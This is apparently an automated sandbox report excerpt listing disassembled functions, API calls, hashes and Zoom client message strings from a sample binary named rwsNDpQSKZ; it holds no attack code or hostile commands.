                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: AdditionalInfo$MsgID$Options$com.Zoom.app.pt.upload.feedback
                • API String ID: 1443623190-506818149
                • Opcode ID: de5cc88ffdd57cb1975eb2294340751dab10f2db39e1f7875b5ba6a1105354d2
                • Instruction ID: 2ffb9699f80ae78d72f6765cfeeb3a5c258b622a7f606e22a011e48efcda3526
                • Opcode Fuzzy Hash: de5cc88ffdd57cb1975eb2294340751dab10f2db39e1f7875b5ba6a1105354d2
                • Instruction Fuzzy Hash: 0241CE74E007089BCF14EFA4D8496DDB7B0AF44319F044128EC12A73C1DF709A8ADBA9
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C9676C
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C77346), ref: 00C96780
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.start.whiteboard.share,00000044), ref: 00C967B2
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C967EF
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.start.whiteboard.share,?), ref: 00C96821
                • EnterCriticalSection.KERNEL32(00000044), ref: 00C96893
                • LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C968B0
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?), ref: 00C968C3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: b_make_permanent$com.Zoom.app.pt.start.whiteboard.share$doc_id$sharing_role
                • API String ID: 1443623190-495026792
                • Opcode ID: 59b236a98dea979111fe67304f8eefa27ed8b43124792dbbacf92db9037ec8b7
                • Instruction ID: 71b02068bb2fde9ad6230720a62ed198e4767854cbedb4fa41eb55711e0c6944
                • Opcode Fuzzy Hash: 59b236a98dea979111fe67304f8eefa27ed8b43124792dbbacf92db9037ec8b7
                • Instruction Fuzzy Hash: 3241CF74E007089BCF14EFB4D849ADDB7B5AF44315F044128E812AB3D1DF709A8ADBA9
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C94707
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C75176), ref: 00C9471B
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notify.pt.feedback.info,00000044), ref: 00C9474D
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C9478A
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notify.pt.feedback.info,?), ref: 00C947BC
                • EnterCriticalSection.KERNEL32(00000044), ref: 00C9482E
                • LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C9484B
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?), ref: 00C9485E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.Zoom.app.conf.notify.pt.feedback.info$customizedMsg$isTextFieldEnable$meetingInfo
                • API String ID: 1443623190-3133408118
                • Opcode ID: 5fd6b514b41998f51a3602969e677d00600f7d197986b0eaf71055b8496ab4d2
                • Instruction ID: d2be27660528b13dcbdd1532c0292cf70b95422413acd42435118362d7107a7b
                • Opcode Fuzzy Hash: 5fd6b514b41998f51a3602969e677d00600f7d197986b0eaf71055b8496ab4d2
                • Instruction Fuzzy Hash: E441C474D017089BCF18EFA4D849ADDB7B5AF44315F044128E812B7391DF709A8BDB69
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C94AE7
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C756B6), ref: 00C94AFB
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.pair.relation.token.response,00000044), ref: 00C94B2D
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C94B6A
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.pair.relation.token.response,?), ref: 00C94B9C
                • EnterCriticalSection.KERNEL32(00000044), ref: 00C94C0E
                • LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C94C2B
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?), ref: 00C94C3E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: com.Zoom.app.conf.pair.relation.token.response$response_id$result$token
                • API String ID: 1443623190-1409877518
                • Opcode ID: 02b2009a8d9fa5c31659c1033ef7651d99241c4755acc5438d4cfae06bb47acb
                • Instruction ID: 1d9e48a4dfba7473ccd4839691b16da2b976b04694caae0e385dff816fe067fa
                • Opcode Fuzzy Hash: 02b2009a8d9fa5c31659c1033ef7651d99241c4755acc5438d4cfae06bb47acb
                • Instruction Fuzzy Hash: 5441F474E017089FCF28EFA4C949ADDBB71AF44315F044118E812AB391DF709A8BDB65
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C90EA7
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C70356), ref: 00C90EBB
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.virtual.microphone.create.request,00000044), ref: 00C90EED
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?), ref: 00C90F2A
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.zoom.app.assistant.sip.virtual.microphone.create.request,?), ref: 00C90F5C
                • EnterCriticalSection.KERNEL32(00000044), ref: 00C90FCE
                • LeaveCriticalSection.KERNEL32(00000044,?), ref: 00C90FEB
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,?), ref: 00C90FFE
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: audioCapture$com.zoom.app.assistant.sip.virtual.microphone.create.request$deviceGUID$deviceName
                • API String ID: 1443623190-4234925160
                • Opcode ID: c01c33f8bcbdad4e1ad3afaa3b608a60fe131ee3b670f33e6a05ee3ebc57d513
                • Instruction ID: 079e97667e8d07bd22ccc1507a83cbf5c5c1b4d6eb588c7afb5cbb198c1ad060
                • Opcode Fuzzy Hash: c01c33f8bcbdad4e1ad3afaa3b608a60fe131ee3b670f33e6a05ee3ebc57d513
                • Instruction Fuzzy Hash: BB41D235D007099FCF24EFA4C8496DEB7B4AF44305F144118E812A7381DF709B8ADB69
                APIs
                • __EH_prolog3.LIBCMT ref: 00C680A7
                • ??0?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH000000000@Z.RWSNDPQSKZ(com.Zoom.app.pt.shareFileInMeetingChat,0000274E,previewUrl,downloadUrl,fileName,thumbnailUrl,fileSize,fileId,type,previewPath,reqUid,00000004), ref: 00C680E8
                  • Part of subcall function 00C7F7A0: __EH_prolog3.LIBCMT ref: 00C7F7A7
                  • Part of subcall function 00C7F7A0: ??0?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH00000000@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,00000004,00C680ED,com.Zoom.app.pt.shareFileInMeetingChat,0000274E,previewUrl,downloadUrl), ref: 00C7F7CF
                  • Part of subcall function 00C8581F: __EH_prolog3_GS.LIBCMT ref: 00C85826
                  • Part of subcall function 00C8581F: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C68114), ref: 00C8583A
                  • Part of subcall function 00C8581F: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.shareFileInMeetingChat,00000044,00C68114), ref: 00C8586C
                  • Part of subcall function 00C8581F: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,com.Zoom.app.pt.shareFileInMeetingChat,00000044,00C68114), ref: 00C858A9
                  • Part of subcall function 00C8581F: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.pt.shareFileInMeetingChat,?,-00000004,com.Zoom.app.pt.shareFileInMeetingChat,00000044,00C68114), ref: 00C858DB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: V12@$Cmm@@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@V12@@$H000000000@H00000000@H_prolog3_Node@23@Root@Template_8@Template_9@Tree
                • String ID: com.Zoom.app.pt.shareFileInMeetingChat$downloadUrl$fileId$fileName$fileSize$previewPath$previewUrl$reqUid$thumbnailUrl$type
                • API String ID: 1181993142-3969188618
                • Opcode ID: 1a8be9c474eb716c3e0513196ec6ddbd2314cfa4abb92aa972cc18a14ef32b0d
                • Instruction ID: ac4e15c0b5de6eebcbcc801625fd0937cde7a822ddb666645dce2b7a24f3e8f8
                • Opcode Fuzzy Hash: 1a8be9c474eb716c3e0513196ec6ddbd2314cfa4abb92aa972cc18a14ef32b0d
                • Instruction Fuzzy Hash: 98F08CB0BC1B40FED21077547C87B1D65A0BB10F1AF504928B1407A3DACAF0050CD675
                APIs
                • __EH_prolog3.LIBCMT ref: 00C70967
                • ??0?$CmmMessageTemplate_9@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH000000000@Z.RWSNDPQSKZ(com.Zoom.app.conf.notify.leave.before.meeting.start,00002751,meetingNum,meetingID,userName,phoneID,secretKey,trackingId,externMsg,panalistKey,inMeetingAccessToken,00000004), ref: 00C709A8
                  • Part of subcall function 00C7AC40: __EH_prolog3.LIBCMT ref: 00C7AC47
                  • Part of subcall function 00C7AC40: ??0?$CmmMessageTemplate_8@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@V12@@Archive@Cmm@@QAE@PBDH00000000@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,?,00000004,00C709AD,com.Zoom.app.conf.notify.leave.before.meeting.start,00002751,meetingNum,meetingID), ref: 00C7AC6F
                  • Part of subcall function 00C911D0: __EH_prolog3_GS.LIBCMT ref: 00C911D7
                  • Part of subcall function 00C911D0: ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C709D4), ref: 00C911EB
                  • Part of subcall function 00C911D0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notify.leave.before.meeting.start,00000044,00C709D4), ref: 00C9121D
                  • Part of subcall function 00C911D0: ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(?,-00000004,com.Zoom.app.conf.notify.leave.before.meeting.start,00000044,00C709D4), ref: 00C9125A
                  • Part of subcall function 00C911D0: ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.conf.notify.leave.before.meeting.start,?,-00000004,com.Zoom.app.conf.notify.leave.before.meeting.start,00000044,00C709D4), ref: 00C9128C
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$V12@$??0?$Archive@String$Archive$H_prolog3MessagePackageTree@V12@@V12@_$H000000000@H00000000@H_prolog3_Node@23@Root@Template_8@_Template_9@_Tree
                • String ID: com.Zoom.app.conf.notify.leave.before.meeting.start$externMsg$inMeetingAccessToken$meetingID$meetingNum$panalistKey$phoneID$secretKey$trackingId$userName
                • API String ID: 2743289684-272397337
                • Opcode ID: 2b7d825653b8fdcadcc20ce90b42c11ec5c3f0741348c09d3ea346c8779805e8
                • Instruction ID: fbe916212ce702cda57ac1f356ef1c7403cdce8267c6e32570c2608d2d990bd4
                • Opcode Fuzzy Hash: 2b7d825653b8fdcadcc20ce90b42c11ec5c3f0741348c09d3ea346c8779805e8
                • Instruction Fuzzy Hash: 16F0A061BD0351BED700AB555D07B1DAAA0A720F27F50C468B608792D2CAF1850CDB75
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C5E9DC
                • #21.MAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000070,00C5C4FE), ref: 00C5EA07
                • #19.MAPI32(00000000,?,00000070,00C5C4FE,00D33368,?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EA21
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EA45
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00000101,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EA6B
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000001,00000000,?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EA97
                • ?Assign@?$CStringT@D@Cmm@@QAEXPBD@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EB01
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EB1A
                • #140.MAPI32(?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EB37
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000001,00000000,?), ref: 00C5EB70
                • ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(-00000004,?), ref: 00C5EBC4
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EC03
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,?,?,?,?,?,?,?,?,000000A4,00C5C3F2), ref: 00C5EC1A
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$State@Unlock@$Assign@?$String$#140H_prolog3_
                • String ID:
                • API String ID: 1866024443-0
                • Opcode ID: 0bf3dad885ed6da3e445a9961382bc1cab87972826789d5bda01717f83dc4e4d
                • Instruction ID: 0c07d3314adeb7efeed231f622b7307f0cfe594bb0e8f2cf99bd6978393797ed
                • Opcode Fuzzy Hash: 0bf3dad885ed6da3e445a9961382bc1cab87972826789d5bda01717f83dc4e4d
                • Instruction Fuzzy Hash: 3C714D74D00218DFCB18DFA5C895A9DBBB5FF08316F24416DE816A7252CB70AE89CF18
                APIs
                • GetModuleFileNameW.KERNEL32(00000000,00DEF0DC,000007CF,00000000,00000000), ref: 00CD4A72
                • SHGetSpecialFolderPathW.SHELL32(00000000,00DF007C,0000001A,00000000), ref: 00CD4DD7
                • GetProcessHeap.KERNEL32(00000000,00000004), ref: 00CD4E6E
                • HeapAlloc.KERNEL32(00000000), ref: 00CD4E75
                • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000024,00000000), ref: 00CD4EB9
                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00CD4ED8
                • GetProcessHeap.KERNEL32(00000000,00000026), ref: 00CD4F1C
                • HeapAlloc.KERNEL32(00000000), ref: 00CD4F23
                • Concurrency::cancel_current_task.LIBCPMT ref: 00CD4FB0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Heap$AllocFolderPathProcessSpecial$Concurrency::cancel_current_taskDirectoryFileModuleNameWindows
                • String ID: $$\
                • API String ID: 3239228962-1395706711
                • Opcode ID: 58ba7b6dc0e154e8772dd5725391f3035f0457015a9771f3c95439433712489c
                • Instruction ID: 31d49ef5a936bfaa6dd6b777dadd4e90afcc8d4a446e386d6f681b352d353eda
                • Opcode Fuzzy Hash: 58ba7b6dc0e154e8772dd5725391f3035f0457015a9771f3c95439433712489c
                • Instruction Fuzzy Hash: 82D15935A00344DBD72C9B24DC85B7A77A5EB95350F24466BEB26C73A1EB709E80C7A0
                APIs
                • ___free_lconv_mon.LIBCMT ref: 00D0884E
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07B6F
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07B81
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07B93
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07BA5
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07BB7
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07BC9
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07BDB
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07BED
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07BFF
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07C11
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07C23
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07C35
                  • Part of subcall function 00D07B52: _free.LIBCMT ref: 00D07C47
                • _free.LIBCMT ref: 00D08843
                  • Part of subcall function 00CFE54D: HeapFree.KERNEL32(00000000,00000000,?,00D082A9,?,00000000,?,?,?,00D0854C,?,00000007,?,?,00D089A1,?), ref: 00CFE563
                  • Part of subcall function 00CFE54D: GetLastError.KERNEL32(?,?,00D082A9,?,00000000,?,?,?,00D0854C,?,00000007,?,?,00D089A1,?,?), ref: 00CFE575
                • _free.LIBCMT ref: 00D08865
                • _free.LIBCMT ref: 00D0887A
                • _free.LIBCMT ref: 00D08885
                • _free.LIBCMT ref: 00D088A7
                • _free.LIBCMT ref: 00D088BA
                • _free.LIBCMT ref: 00D088C8
                • _free.LIBCMT ref: 00D088D3
                • _free.LIBCMT ref: 00D0890B
                • _free.LIBCMT ref: 00D08912
                • _free.LIBCMT ref: 00D0892F
                • _free.LIBCMT ref: 00D08947
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                • String ID:
                • API String ID: 161543041-0
                • Opcode ID: 3f95d8db83ddda560080a7d932a8f1c74de7f650519ff75e811030b865cccb3f
                • Instruction ID: 11ac57dfa321c4c4e117a87f5bb80bd2178e25eecce90f2d7a6bd8beee270a72
                • Opcode Fuzzy Hash: 3f95d8db83ddda560080a7d932a8f1c74de7f650519ff75e811030b865cccb3f
                • Instruction Fuzzy Hash: ED313E31A00345DFDB61AA39E845B6677E9EF00354F988429E599D71A1EF30ED80FB31
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00C88017
                • ??0CCmmArchivePackageTree@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(00000044,00C69869), ref: 00C8802B
                  • Part of subcall function 00C5DC01: __EH_prolog3.LIBCMT ref: 00C5DC08
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.addClientLog,00000044,00C69869), ref: 00C8805D
                • ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ.RWSNDPQSKZ(00000044,-00000004,com.Zoom.app.addClientLog,00000044,00C69869), ref: 00C8809A
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(-00000004,com.Zoom.app.addClientLog,00000044,-00000004,com.Zoom.app.addClientLog,00000044,00C69869), ref: 00C880CC
                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00002728,Action,00D35A98,00D35A7C), ref: 00C88186
                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00002728,Action,00D35A98), ref: 00C881A3
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000001,00000044,-00000004,com.Zoom.app.addClientLog,00000044,00C69869), ref: 00C881B6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$Archive$??0?$Archive@CriticalPackageSectionStringTree@$EnterH_prolog3H_prolog3_LeaveNode@23@Root@State@TreeUnlock@
                • String ID: Action$ActionSource$com.Zoom.app.addClientLog
                • API String ID: 1443623190-860503860
                • Opcode ID: 45464f2322f32c0303eb3136055bb21fb57d6aa50632889b40c76402f7d34a6a
                • Instruction ID: d80d982e9caae6d513921428b21a307016224f3fe51b753c1d52ded6d1a52203
                • Opcode Fuzzy Hash: 45464f2322f32c0303eb3136055bb21fb57d6aa50632889b40c76402f7d34a6a
